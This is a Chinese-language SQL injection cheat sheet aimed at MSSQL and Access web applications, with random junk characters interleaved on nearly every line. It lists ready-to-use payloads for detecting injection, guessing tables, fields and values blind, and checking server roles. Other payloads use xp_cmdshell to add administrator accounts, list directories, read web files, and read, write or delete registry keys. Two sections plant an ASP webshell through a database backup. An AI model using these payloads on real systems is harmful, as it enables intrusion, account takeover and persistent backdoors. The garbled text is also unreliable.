1.判断是否有注入;and 1=1 ;and 1=2 p���cscNUp
2.初步判断是否是mssql ;and user>0 AZNo%!)o��
\J?�&XaO�=
3.注入参数是字符'and [查询条件] and ''=' s���2N�'Ip
'#�j�6ZC/?
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ��h \���`(
�@g#| srYD
5.判断数据库系统 ]mo��BVRd�
Fv/�{)H<:y
;and (select count(*) from sysobjects)>0 mssql /#_[�{lSr?
4Vf-D%
h>a
;and (select count(*) from msysobjects)>0 access F [-D
+Nka
��(1er?4�
���O@H�D�'
C$�at9=(E6
6.猜数据库 ;and (select Count(*) from [数据库名])>0 n.5M6�i/~a
A~�?)g!tS<
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 ,T��� ��3M
Bg�si$2hI
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 @�{�<�^rLt
#�g�f0�*:p
9.(1)猜字段的ascii值(access) 7�I(�QTc)*
n^G[N-�\�3
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 yQu/�(�{D�
�6+>X`k%�D
(2)猜字段的ascii值(mssql) @�1pfH��\m
�t�g/!=g��
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �4�� l�+z
����DYZk1
10.测试权限结构(mssql) -��=1>t3~\
fx^�yC.$�2
@v�/A�e_q!
+'[*ikxD=g
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- '2�<N_)43$
<1~_�nt~(*
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- KmD��#I��a
e�VbT��<9k
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- /��(s N@kt
YZ->��ep�}
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- &�"�yoJ�<L
e]:(.Wb- 9
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- hx~rq��`{�
56Lt "�Z F
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- N_�0B[!B]�
`[_p�,,}Ir
;and 1=(select IS_MEMBER('db_owner'));-- O�`>�u7�0�
h)r=+Q\'(S
lb}:�!��Y�
7<5=fYb�r
11.添加mssql和系统的帐户 �CSFE�[F63
@[ ��'?AsO
;exec master.dbo.sp_addlogin username;-- \�&v)#w���
;exec master.dbo.sp_password null,username,password;-- 8�tT�/�w�5
��9��1�FVe
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- S)^eHuXPI
[Z�]C��BEE
;exec master.dbo.xp_cmdshell 'net user username password ]#FQde4]5�
# *7ImEN��
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ,YrPwdaTB�
k,/2]{#53d
;exec master.dbo.xp_cmdshell 'net user username password /add';-- }A<�fC�m7�
��$�j0<ef!
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- o<Rr�r�,��
&:�=[\Ws R
M�nW"k�sH�
C�^
~[�b
o
12.(1)遍历目录 %c��q8%�RT
zgSv� -h+f
;create table dirs(paths varchar(100), id int) A�^7}:[s20
��TzV~I\a|
;insert dirs exec master.dbo.xp_dirtree 'c:\' )5s-�"�o<�
#4^D�'r>pJ
;and (select top 1 paths from dirs)>0 |OB�ZSk1jp
6�"o@�d8>v
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) o{MmW~�/o&
)KN]"<jB�
u< 5�{H='6
w�`>g^_xsg
(2)遍历目录 -��lI6!a^�
ek0,�@�Vg9
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 2�D�{`A��J
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 }vX/�55��
f�rbeCBP&)
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 ^A��� t,x
{9h`h08?z�
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 BH��I�C6i%
�P{>-MT2E
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 �Y�^}c+�)t
FmtV[�C��#
�ap�.L=�vn
�Q�|�W�~6
13.mssql中的存储过程 8F�T@�TUFb
YR0.m%�U�,
xp_regenumvalues 注册表根键, 子键 �]iH~��1�[
>T�e h ?P�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 Nvj���KB)J
d���2<+P�p
xp_regread 根键,子键,键值名 h�kvymHaG�
p!p:LSk"/b
;exec xp_regread �%9`\�7h7K
N/�eFwv.Er
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 #w]@yL]|is
�0D^c4[Y'l
xp_regwrite 根键,子键, 值名, 值类型, 值 q��
`^��5<
5��,�K*IH�
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �fdzaM��&
sn:wLc/GAd
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �2)+ddel<Z
[[vb�w)u�
xp_regdeletevalue 根键,子键,值名 [5s4Jp$�+�
-!pg1w�06�
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 Q%^!j�_��#
#�)EVi7UP�
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 v[=TPfX�0�
)w&k&TY4�H
�w2o�5+G=�
�s
N|7���
14.mssql的backup创建webshell z�F�e�o8S
)�E�(9
R(�
use model Qwu~�{tf+'
s2�iL5N|"Q
create table cmd(str image); ��y�?yW�M8
?cD�2EX%�(
insert into cmd(str) values (''); 2]f?��c%)I
Pvu*Y�0�_p
backup database model to disk='c:\l.asp'; L&h90Az1�W
/U =eB?��>
B0�eKj=�y;
yOXL19d@p_
15.mssql内置函数 �f%5 s��8)
i4^1��b�d�
;and (select @@version)>0 获得Windows的版本号 hT�K�6�N��
�X*�Cvh�|�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa f<v:��Tg.[
ju�{\7X5��
;and (select user_name())>0 爆当前系统的连接用户 mnS F=l;;
@Zov&0�1��
;and (select db_name())>0 得到当前连接的数据库 ^=V b'g3P~
U���CF'%�R
j9]H~:�g$d
0)�T`&u3!�
16.简洁的webshell ��K~�S��hV
=%�+o�4\N,
use model Z�V�X!=3VT
@A�p~Wok�
create table cmd(str image); >@w��yiBU�
yC�LDJ%�8�
insert into cmd(str) values (''); ?t�a(�`�+"
�{X'D0�7�q
backup database model to disk='g:\wwwtest\l.asp';
